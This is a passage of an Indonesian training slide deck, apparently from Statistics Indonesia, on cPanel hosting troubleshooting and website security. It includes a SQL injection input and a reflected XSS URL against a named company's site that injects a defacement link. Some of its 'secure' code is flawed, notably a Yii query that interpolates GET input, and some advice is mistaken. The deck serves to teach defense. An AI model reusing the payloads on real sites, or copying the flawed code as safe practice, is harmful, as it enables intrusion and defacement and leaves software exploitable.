- 127. KAS US 7 FORBIDDEN ACCESS-3 Troubleshoot : 1. Jika menggunakan CMS dengan versi lama, segera lakukan upgrade dengan versi terbaru. 2. Jangan menggunakan ekstensi tambahan sebelum melihat ada tidaknya permasalahan security di extension tersebut 3. Pencegahan dari sisi web Server sudah dilakukan. Sehingga perlu dilakukan pencegahan juga dari pengelola website 127
- 128. KAS US 8 INTERNAL SERVER ERROR - 1 128
- 129. KAS US 8 INTERNAL SERVER ERROR - 2 Identifikasi : Dapat disebabkan oleh virus atau kerusakan file web. Troubleshoot : 1. Hapus seluruh file web di server (/public_html) 2. Upload ulang file web baru yang berjalan di PC lokal 3. Jika belum juga solve, hubungi JKD 129
- 130. KAS US 9 COULD NOT WRITE/DELETE FILE-1 130
- 131. KAS US 9 COULD NOT WRITE/DELETE FILE-2 Identifikasi : Hal ini dimungkinkan karena ruang disk yang digunakan sudah melebihi dari kuota yang diperbolehkan. Jika tidak dapat menghapus file dari server, hal ini dikarenakan file tersebut mempunyai owner yang berbeda. Troubleshoot : 1. Cek disk space pada halaman manajemen Cpanel. Jika disk space menunjukkan warna merah hapus file yang tidak perlu, atau tidak digunakan. 2. Untuk masalah perbedaan owner, hubungi subdit JKD untuk melakukan permintaan penghapusan file dengan menyertakan nama file maupun path/lokasi file atau folder yang mau dihapus. 131
- 132. PROBLEM LAINNYA ? Khusus permasalahan teknis website : 1. e-Ticket : Silakan membuat tiket di sistem manajemen keluhan Subdit JKD – https://noc.bps.go.id/support/ 2. email : jkd@bps.go.id Untuk permasalahan konten website : Silakan menghubungi Subdirektorat Layanan dan Promosi Statistik. 132
- 133. PROSEDUR PENAMBAHAN QUOTA BANDWIDTH DAN DISK Ketentuan penambahan kuota bandwidth dan disk space sebagai berikut : 1. Mengirim email ke jkd@bps.go.id dengan melampirkan surat/memo kepala kantor. 2. Isi surat/memo dengan menyertakan jumlah penambahan dan alasan penambahan kuota bandwidth atau disk space. Jumlah realisasi penambahan kuota sesuai dengan kebijakan Subdit Jaringan Komunikasi Data. 133
- 134. KEAMANAN PEMBINAAAN PENGELOLA TEKNOLOGI INFORMASI WEBSITE Badan Pusat Statistik 134
- 135. CAKUPAN MATERI 1. Pengantar Keamanan Website 2. Contoh Serangan & Trubleshooting 3. Tips & Trik 135
- 136. KENAPA WEBSITE PERLU KITA JAGA KEAMANANNYA ? Resiko kerugian finansial. Resiko kerugian kerahasiaan. Resiko kerugian harga diri. 136 A. PENGANTAR KEAMANAN WEBSITE
- 137. RESIKO KERUGIAN FINANSIAL -1 3 hacking Nasabah/Pengguna Website Bank/e-commerce peretas Request 1 Request 1 Respons 2 Respons 2 hacking 3 137 A. PENGANTAR KEAMANAN WEBSITE
- 138. RESIKO KERUGIAN FINANSIAL - 2 3 hacking Nasabah/Pengguna Website Bank/e-commerce peretas Request 1 Request 1 Respons 2 Respons 2 hacking 3 138 A. PENGANTAR KEAMANAN WEBSITE
- 139. RESIKO KERUGIAN KERAHASIAAN -1 Pengguna Website Request 1 Request 1 Respons 2 Respons 2 139 A. PENGANTAR KEAMANAN WEBSITE
- 140. RESIKO KERUGIAN KERAHASIAAN - 2 3 peretas hacking Pengguna Website Request 1 Request 1 Respons 2 Respons 2 hacking 3 140 A. PENGANTAR KEAMANAN WEBSITE
- 141. RESIKO KERUGIAN KERUGIAN KERAHASIAAN (3) - 3 Kerugian Kerahasiaan Kerugian Finansial 141 A. PENGANTAR KEAMANAN WEBSITE
- 142. RESIKO KERUGIAN HARGA DIRI - 1 Pengguna Website Request 1 Request 1 Respons 2 Respons 2 142 A. PENGANTAR KEAMANAN WEBSITE
- 143. RESIKO KERUGIAN HARGA DIRI - 2 3 peretas hacking Pengguna Website Request 1 Request 1 Respons 2 Respons 2 hacking 3 143 A. PENGANTAR KEAMANAN WEBSITE
- 144. RESIKO KERUGIAN HARGA DIRI - 3 144 A. PENGANTAR KEAMANAN WEBSITE
- 145. APA YANG DISEBUT DENGAN WEBSITE YANG AMAN ? Confidentiality. Integrity. Availability. Authentication. Nonrepudiation. 145 A. PENGANTAR KEAMANAN WEBSITE
- 146. CONFIDENTIALITY Informasi (data) website hanya bisa diakses oleh pihak yang memiliki wewenang. Website Request 3 Akses Data 4 Accept 4 2 Pengguna Accep2t authorized Request Akses Data 1 Pengguna unauthorized Denied Request Akses Data 1 Request Akses Data 3 Denied 146 A. PENGANTAR KEAMANAN WEBSITE
- 147. INTEGRITY Informasi website hanya dapat diubah oleh pihak yang memiliki wewenang. Website Request 3 Ubah Data 4 Accept 4 2 Pengguna Accep2t authorized Request Ubah Data 1 Pengguna unauthorized Denied Request Ubah Data 1 Request Ubah Data 3 Denied 147 A. PENGANTAR KEAMANAN WEBSITE
- 148. AVAILABILITY Informasi website selalu tersedia untuk pihak yang memiliki wewenang ketika dibutuhkan. 4 response Request Website 1 2 4 Pengguna respon2se Authorized 1 1 Request Pengguna Authorized 2 3 Request Request 3 non response non response 148 A. PENGANTAR KEAMANAN WEBSITE
- 149. AUTHENTICATION Pihak yang terlibat dengan pertukaran informasi dapat diidentifikasi dengan benar dan ada jaminan bahwa identitas yang didapat tidak palsu. Pengguna 1 Pengguna 2 Identifikasi Pengguna 1 Identifikasi Pengguna 1 149 A. PENGANTAR KEAMANAN WEBSITE
- 150. NONREPUDIATION Pengirim maupun penerima informasi tidak dapat menyangkal pengiriman dan penerimaan pesan. 150 A. PENGANTAR KEAMANAN WEBSITE
- 151. TUJUAN KEAMANAN Prevention - Penjagaan Detection - Deteksi Recovery - Memperbaiki 151 A. PENGANTAR KEAMANAN WEBSITE
- 152. HUKUM ALAM KEAMANAN - 1 “TIDAK ADA SISTEM YANG 100% AMAN” 152 A. PENGANTAR KEAMANAN WEBSITE
- 153. HUKUM ALAM KEAMANAN - 2 Fungsional Posisi sistem website Keamanan Kenyamanan 153 A. PENGANTAR KEAMANAN WEBSITE
- 154. DARI ANCAMAN APA WEBSITE INI PERLU KITA JAGA ? Interruption Interception Modification Fabrication 154 A. PENGANTAR KEAMANAN WEBSITE
- 155. CONTOH SERANGAN 155 A. PENGANTAR KEAMANAN WEBSITE
- 156. MOTIF-MOTIF SERANGAN Politis Finansial Dendam/sakit hati Iseng Sebagai pekerjaan (cracker bayaran) Dan lain-lain 156 A. PENGANTAR KEAMANAN WEBSITE
- 157. TAHAPAN PENYERANGAN Reconnaissance Scanning Gaining access Maintaining access Covering tracks 157 A. PENGANTAR KEAMANAN WEBSITE
- 158. KAPAN KITA HARUS MENJAGA WEBSITE TERSEBUT ? Sebagian besar mesin yang bekerja Secara berkala manusia juga harus memantau dan memonitor keamanan website 158 A. PENGANTAR KEAMANAN WEBSITE
- 159. SIAPA YANG BERTANGGUNGJAWAB UNTUK MENJAGA WEBSITE TERSEBUT ? Pengelola hosting. Subdit JKD BPS RI Pengelola website/ Programmer website. 159 A. PENGANTAR KEAMANAN WEBSITE
- 160. FIREWALL & SISTEM KEAMANAN SERVER HOSTING BPS Firewall CSF Mod Security Antivirus ClamAV Konfigurasi User Mode read & write = file 644, direktori 755 (default) Batas salah password login = 5 kali port yg diizinkan : FTP 21, Browser 80, Mangement Cpanel 2083 Kuota bandwidth = 2GB Kuota disk space = 2GB upload_max_filesize = 2MB 160 A. PENGANTAR KEAMANAN WEBSITE
- 161. BUFFER OVERFLOW - 1 Serangan Buffer overflow terjadi ketika si penyerang memberikan input yang berlebihan pada program yang di jalankan, sehingga program mengalami kelebihan muatan dan memory tidak dapat mengalokasikannya. 161 B. CONTOH SERANGAN & TROUBLESHOOTING
- 162. BUFFER OVERFLOW - 2 void sample_function (void) { char buffer(10); printf ("Happy Happy !n"); return ; } main() { sample_function(); printf("Hello Word!n"); } 1 2 3 void sample_function ( void) { char buffer(10); strcpy (buffer,”Happy Happy!n”); printf (buffer); return ; } main() { sample_function(); printf("Hello Word!n"); } 4 5 6 buffer = 10 karakter “Happy Happy!n” = 13 karakter Buffer Overflow 162 B. CONTOH SERANGAN & TROUBLESHOOTING
- 163. TROUBLESHOOT : BUFFER OVERFLOW Menulis kode yang aman Coding dengan teliti dan sabar sehingga kemungkinan kekeliruan coding yang menyebabkan buffer over flow dapat dihindari. 163 B. CONTOH SERANGAN & TROUBLESHOOTING
- 164. INSTALASI DEFAULT Password default diketahui oleh khalayak. Sampel program/code website dapat diexploitasi. Dan lain-lain. 164 B. CONTOH SERANGAN & TROUBLESHOOTING
- 165. TROUBLESHOOT : INSTALASI DEFAULT Lakukan konfigurasi seaman mungkin. Buang semua yang tidak diperlukan saat website dihosting. Bedakan website development & website production . Ganti password default. 165 B. CONTOH SERANGAN & TROUBLESHOOTING
- 166. SQL INJECTION - 1 SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. 166 B. CONTOH SERANGAN & TROUBLESHOOTING
- 167. SQL INJECTION - 2 Query : "SELECT * FROM pengguna WHERE nama = '" + namaPengguna + "';“ Masukkan : a' or 't'='t Pada query akan seperti : SELECT * FROM pengguna WHERE nama = 'a' or 't'='t'; 167 B. CONTOH SERANGAN & TROUBLESHOOTING
- 168. TROUBLESHOOT : SQL INJECTION Filter nilai input dengan baik di sisi server Contoh : Gunakan mysql_real_escape_string. Jika perlu, jadikan variabel get menjadi absolute integer. 168 B. CONTOH SERANGAN & TROUBLESHOOTING
- 169. INFORMATION LEAKAGE AND IMPROPER ERROR HANDLING Serangan ini adalah akibat dari suatu pesan error yang terpampang pada suatu website. Penyerang menggunakan celah informasi yang didapatkan dari pesan error tersebut, serta file-file ataupun konfigurasi yang dapat dilihat. A Database Error Occurred Error Number: 1062 Duplicate entry 'alan pardew' for key 2 UPDATE manager SET name = 'alan pardew' WHERE id = '2' Filename: /var/www/vhosts/mysite.com/httpdocs/personal/models/manager_model.php Line Number: 74 169 B. CONTOH SERANGAN & TROUBLESHOOTING
- 170. TROUBLESHOOT : INFORMATION LEAKAGE AND IMPROPER ERROR HANDLING Jangan pernah menampilkan pesan error apapun yang berhubungan dengan sistem/konfigurasi website. 170 B. CONTOH SERANGAN & TROUBLESHOOTING
- 171. CROSS SITE SCRIPTING - 1 Cross Site Scripting (XSS) merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Targetnya adalah user, bukan aplikasi. 171 B. CONTOH SERANGAN & TROUBLESHOOTING
- 172. CROSS SITE SCRIPTING - 2 Ilustrasi Cross Site Scripting 172 B. CONTOH SERANGAN & TROUBLESHOOTING
- 173. CROSS SITE SCRIPTING - 3 Contoh website yang dapat diserang XSS http://www.pln.co.id/kontak-kami/ telusur.php?nokeluhan=%22%20style=%22display:none%22%3E%3C/iframe%3E% 3Cp%20align=%22center%22%3E%3Ca%20href=%22http://cirebon-cyber4rt. blogspot.com%22%20target=%22_blank%22%3E%3Cimg%20src=%22http://i11 21.photobucket.com/albums/l513/iqbalkanci/cirebon-cyber4rtblogspotcom. png%22%20border=%220%22%3E%3C/a%3E%3C/p%3E%3Cifra me%20style=%22display:none%22%3E 173 B. CONTOH SERANGAN & TROUBLESHOOTING
- 174. CROSS SITE SCRIPTING - 4 Akibat dari XSS : • Hijack account • Menyebarkan Worm • Mengakses Cookies • Meremote browser jarak jauh • Scan dan mengeksploitasi peralatan intranet dan aplikasi 174 B. CONTOH SERANGAN & TROUBLESHOOTING
- 175. TROUBLESHOOT : CROSS SITE SCRIPTING Filter nilai input dengan baik di sisi server Contoh : Gunakan mysql_real_escape_string. 175 B. CONTOH SERANGAN & TROUBLESHOOTING
- 176. REMOTE FILE INCLUSION Serangan ini muncul jika administrator website tidak menyertakan validasi yang tepat (proper validation) sehingga siapa saja yang menginginkannya dapat memasukkan file ke dalam sistem. Dengan serangan ini, hacker menginjeksi (inject) sebuah remote file ke dalam server, dan konten file tersebut akan beraksi sesuai dengan apa yang diinginkan oleh hacker. 176 B. CONTOH SERANGAN & TROUBLESHOOTING
- 177. TROUBLESHOOT : REMOTE FILE INCLUSION Gunakan validasi yang tepat pada saat pengguna memasukkan file ke dalam sistem website. Contoh : filter ektension file yang akan di upload 177 B. CONTOH SERANGAN & TROUBLESHOOTING
- 178. Meningkatkan Keamanan pada Joomla • Update versi Joomla dengan versi terbaru • Ganti prefix database bawaan Joomla (jos_) dengan prefix lain • Selalu hanya menginstall extension yang terpercaya dan langsung dari pengembangnya • Install ekstensi / plugin penunjang keamanan joomla (QTablePrefix, AdminExile, dll ) • Selalu backup database dan file secara berkala 178 C. TIPS & TRIK
- 179. Meningkatkan Keamanan pada Wordpress • Ganti nama admin standar wordpress dengan nama yang lebih unique • Buat file .htaccess untuk membatasi akses ip pada wp-admin • Install beberapa plugin pendukung keamanan website (login lockdown, wp-security scan, dll ) • Backup database secara berkala 179 C. TIPS & TRIK
- 180. Keamanan pada framework Yii • Pemberian Hak Akses Pada User • Pencegahan Cross Site Scripting (XSS) • Pencegahan CSRF • Pencegahan Serangan Cookie • Pencegahan SQL Injection 180 C. TIPS & TRIK
- 181. Yii - Pemberian Hak Akses Pada User - 1 Pengembang tentu tidak ingin sembarang orang dapat mengakses data yang ada pada aplikasi. Perlu ada pembatasan siapa yang berhak dan siapa yang tidak berhak mengakses suatu informasi yang ada dalam sistem. 181 C. TIPS & TRIK
- 182. Yii - Pemberian Hak Akses Pada User - 2 public function accessRules() { return array( array('allow', 'actions'=>array('index','view'), 'users'=>array('*'), ), array('allow', 'actions'=>array('update'), 'users'=>array('@'), ), } 182 C. TIPS & TRIK
- 183. Yii - Pencegahan Cross Site Scripting Untuk mencegah serangan XSS, Yii menyertakan produk HTMLPurifier dan menyediakan komponen berguna bagi pengembang bernama CHtmlPurifier yang melapisi HTMLPurifier. <?php$this->beginWidget('CHtmlPurifier'); ?> ...displayuser-entered conten there... <?php$this->endWidget(); ?> 183 C. TIPS & TRIK
- 184. Yii - Pencegahan CSRF Secara default, penjagaan CSRF dimatikan. Untuk menghidupkannya, konfigurasi komponen aplikasi CHttpRequest dalam konfigurasi aplikasi seperti berikut, returnarray( 'components'=>array( 'request'=>array( 'enableCsrfValidation'=>true, ), ), ); 184 C. TIPS & TRIK
- 185. Yii - Pencegahan Serangan Cookie Melindungi cookie dari serangan adalah hal yang sangat penting, karena ID sesi umumnya disimpan dalam cookie.Jika seseorang memegang ID suatu sesi, pada dasarnya dia memiliki semua informasi sesi yang relevan. returnarray( 'components'=>array( 'request'=>array( 'enableCookieValidation'=>true, ), ), ); 185 C. TIPS & TRIK
- 186. Yii - Pencegahan SQL Injection Yii menggunakan beberapa metode untuk mencegah SQL Injection. • Query Builder $user= Yii::app()->db->createCommand() ->select('id, username, profile') ->from('tbl_user u') ->join('tbl_profile p','u.id=p.user_id') ->where('id=:id',array(':id'=>$id)) ->queryRow() • Active Record $id=$_GET['id_user']; User::model()->findAllByAttributes(array("id='$id'")); 186 C. TIPS & TRIK
- 187. C. TIPS & TRIK TATA CARA REVIEW SECURITY OLEH GOOGLE - 1 1. Langkah pertama akses (www.google.com/webmasters/tools/) 2. Jika belum memiliki Account di Google, lakukan proses "Create an account now" terlebih dahulu. Setelah melakukan proses daftar tahap demi tahap, dan hasilnya sukses. Silahkan cek email yang digunakan untuk mendaftar ke Google Webmasters tools tadi, cek email yang bersubjek "Google Email Verification" kemudian klik link yang berfungsi untuk mengaktifkan account dan memverifikasi email yang digunakan untuk mendaftar. 3. Setelah itu Login ke halaman Home (menu utama) Google Webmasters Tools, klik "add a site", lalu masukkan nama Domain kemudian akhiri dengan mengklik tombol "Continue". 187
- 188. TATA CARA REVIEW SECURITY OLEH GOOGLE - 2 4. Setelah itu, ada dua pilihan "Verification method", yaitu : Meta Tag, atau HTML File . Jika memilih metode Meta Tag, sisipkan script meta name di website, simpan kodenya di bagian <head> sebelum bagian <body> yang pertama. Jika menggunakan Wordpress simpan kodenya di bagian sebelum bagian yang pertama, yang biasanya ada di bagian Header.php di theme yang digunakan. Jika memilih metode HTML File, yang harus dilakukan terlebih dahulu adalah (create) buat file dengan nama googlexxxxx (contoh googlef338e1a30ed0450e.html (sesuaikan dengan kode milik Anda)) di file website, kemudian upload file tersebut (misalkan melalui Filezilla) ke public_html. 188 C. TIPS & TRIK
- 189. C. TIPS & TRIK TATA CARA REVIEW SECURITY OLEH GOOGLE - 3 5. Kemudian pada Home (menu utama) Google Webmasters Tools, pilih dan klik nama Domain yang didaftarkan tadi pada bagian "site, verification", maka akan tampil halaman Dashboard, setelah itu klik "link yang bertuliskan "More Detail" pada tulisan "This site may be distributing malware. More Details" (tulisan yang berlatar merah). 6. Langkah selanjutnya, klik link yang bertuliskan "Request a review", kemudian contreng kotak kecil pada tulisan "I certify that I have removed badware or badware links from my site, according to StopBadware.org's Security Tips For Websites". untuk kolom "Comments about the review request (Optional), kosongkan saja (tidak perlu diisi). Akhiri dengan mengklik tombol "Request a review". 189
- 190. TATA CARA REVIEW SECURITY OLEH GOOGLE - 4 7. Setelah mendaftar dan memasukan kode "Google Webmaster Tools", lalukan review secara berkala untuk status website Anda. 8. Bila dalam waktu 24 sampai 48 jam belum juga resolve dari block "Reported Attack Site!", coba lakukan review kembali lewat "Google Webmaster Tools". Bila perlu review melalui fasilitas situs Online yang manangani Malware pada Website/Blog yaitu stopbadware (http://stopbadware.org/home/reportsearch), 190 C. TIPS & TRIK
- 191. Tips untuk pengamanan Website • Batasi ukuran data yang dikirim ke server atau yang dimasukkan ke database. • Tempatkan file yang mengandung konten sensitif diluar direktori Root dokumen. • Gunakan Ekstensi .php untuk semua File Script. • Gunakan permission file 644 dan folder 755. • Cegah mekanisme upload file PHP yang dapat dieksekusi kemudian dengan dipanggil lewat URL. • Cegah flooding dengan session. • Kenali sistem website anda dengan lebih baik daripada pihak lain. 191 C. TIPS & TRIK
Notas do Editor
- Apa yang terjadi ketika user mengakses sebuah halaman website? Seorang User yang sedang duduk di sebuah warnet kemudian membuka halaman website bernama google.com. User tersebut menggunakan sebuah tool yang disebut browser (Penjelajah). Secara tidak sadar user tersebut menyuruh browser untuk membawa sebuah request berupa URL google.com. Aplikasi engine pada browser akan membawa request ke alamat yang dituju melalui firewall dan DNS server melalui sebuah jalan bernama internet. Jika request user lolos dari seleksi keamanan di Firewall maka akan dilajutkan oleh DNS server untuk mencari alamat berupa IP address yaitu 23.45.67.89 Setelah ditemukan IP address pada server hosting maka server hosting akan memberikan responnya sesuai dengan request yang diminta oleh user. Browser akan berlari membawa respon tersebut kepada user yaitu menampilkan halaman dari google.com. Yes!! User bisa melakukan berbagai request lagi , apakah akan melakukan “sign in”, “ I’m feeling lucky”, atau “advance search” THE END
- Untuk pertama kali akan keluar gambar ‘ This Connection Is Untrusted’ Pilih ‘I Understand the Risks’ – ‘Add Exception’ – ‘Confirm Security Exception’
- Tampilan tersebut menggunakan theme ‘x3’. Untuk mengembalikan ke tampilan theme ‘paper_latern’, gunakan menu Switch Theme
- Untuk menambahkan shortcut cPanel dapat mengikuti langkah pada fungsi Shortcut. Untuk menambahkan shortcut di bookmark toolbar, bookmark toolbar harus terlebih dahulu ditampilkan.
- Sebagian besar fungsi (klik kanan) pada file dan folder hampir sama dengan fungsi pada File Manager Toolbar
- Langkah-langkah menghapus user : Menggunakan fungsi Directory Privacy. Pilih direktori yang telah diproteksi. Pada bagian bawah terdapat Authorized User. Pilih user yang ingin di delete. Klik delete.
- Full backup melakukan backup keseluruhan home directory dan database. File hasil backup akan memiliki format penamaan backup-MM-DD-YYYY dengan ekstension tar.ball atau .tar.gz. Ketika telah dibuat, secara default apabila backup telah selesai, notifikasi akan dikirimkan ke email. Namun karena fungsi email dimatikan, maka notifikasi tidak dapat dikirimkan. Download full backup dapat dilakukan bila proses backup selesai dilakukan.
- Menu Metrics/ Logs berisi fitur-fitur yang berhubungan dengan log pengaksesan web
- Keterangan informasi yang ditampilkan : IP Address : IP pengakses Time : waktu pengaksesan Size : banyaknya data yang diakses URL : url yang dikunjungi Referring URL : alamat web yang dikunjungi User Agent : browser yang digunakan pengguna Status : status halaman yang diakses (sukses atau error) Method : request-response client server (GET, POST, etc) Protocol : versi HTTP saat halaman di akses
- Fitur ini dapat juga digunakan pada menu File –File Manager, pada File Window, klik kanan file, maka akan muncul fitur Leech Protect. Langkah mengaktifkan Leech Protection, telah dibahas pada slide sebelumnya
- Jika database tidak dapat diakses, reset password akun cPanel dengan cara: Buka Home – Change Password Pilih Allow MySQL password change Ubah password Klik Change your password now!
- Fitur ini memungkinkan aplikasi lain yang ada pada server “Access Host” menggunakan dan mengakses database yang telah dibuat pada cPanel.
- Fitur ini memberikan informasi mengenai konfigurasi PHP yang ada di server.
- Fitur ini digunakan untuk mencari informasi mengenai domain dan melakukan traceroute dari pc lokal ke server web Dua fungsi utama Track DNS 1. Domain Lookup Digunakan untuk mencari informasi mengenai nama domain. Cara menggunakan: - masukkan nama domain (misalnya bps.go.id) pada Enter a domain.. - Klik Look Up. 2. Trace Route Digunakan untuk melakukan pelacakan network, dari pc lokal ke server web Cara menggunakan: - klik Trace
- Sebaiknya jangan melakukan upload file dalam jumlah banyak pada waktu yang bersamaan.
- Centang ‘Always open this directory in the future when opening File Manager’ bila tidak ingin jendela tersebut selalu muncul. Centang ‘Show Hidden Files (dotfiles)’ bila ingin file yang tersembunyi tampak.
- Nama user secara otomatis akan mempunyai prefiks sesuai username akun cPanel yang membuatnya misalnya : bps1901_. Password sebaiknya gabungan antara huruf kapital, huruf kecil, angka, dan karakter lainnya. Strength password harus melebihi 75.
- Jenis – Jenis serangan adalah sebagai berikut : Interruption Suatu aset dari suatu sistem diserang sehingga menjadi tidak tersedia atau tidak dapat dipakai oleh yang berwenang. Contohnya adalah perusakan/modifikasi terhadap piranti keras atau saluran jaringan. Interception Suatu pihak yang tidak berwenang mendapatkan akses pada suatu aset. Pihak yang dimaksud bisa berupa orang, program, atau sistem yang lain. Contohnya adalah penyadapan terhadap data dalam suatu jaringan. Modification Suatu pihak yang tidak berwenang dapat melakukan perubahan terhadap suatu aset. Contohnya adalah perubahan nilai pada file data, modifikasi program sehingga berjalan dengan tidak semestinya, dan modifikasi pesan yang sedang ditransmisikan dalam jaringan. Fabrication Suatu pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contohnya adalah pengiriman pesan palsu kepada orang lain.
- Tahapan peretas dalam melakukan penyerangan/peretasan adalah sebagai berikut : Reconnaissance Mengumpulkan data mengenai target baik secara aktif dan pasif. Scanning Tanda dimulainya serangan, berusaha mencari jalan masuk ke dalam sistem website. Gaining access Berhasil masuk kedalam sistem target. Maintaining access Mempertahankan akses dgn berbagai cara termasuk menanamkan program dan memperbaiki kelemahan. Covering tracks Menutupi jejak agar tidak dapat di telusuri oleh auditor sistem keamanan website.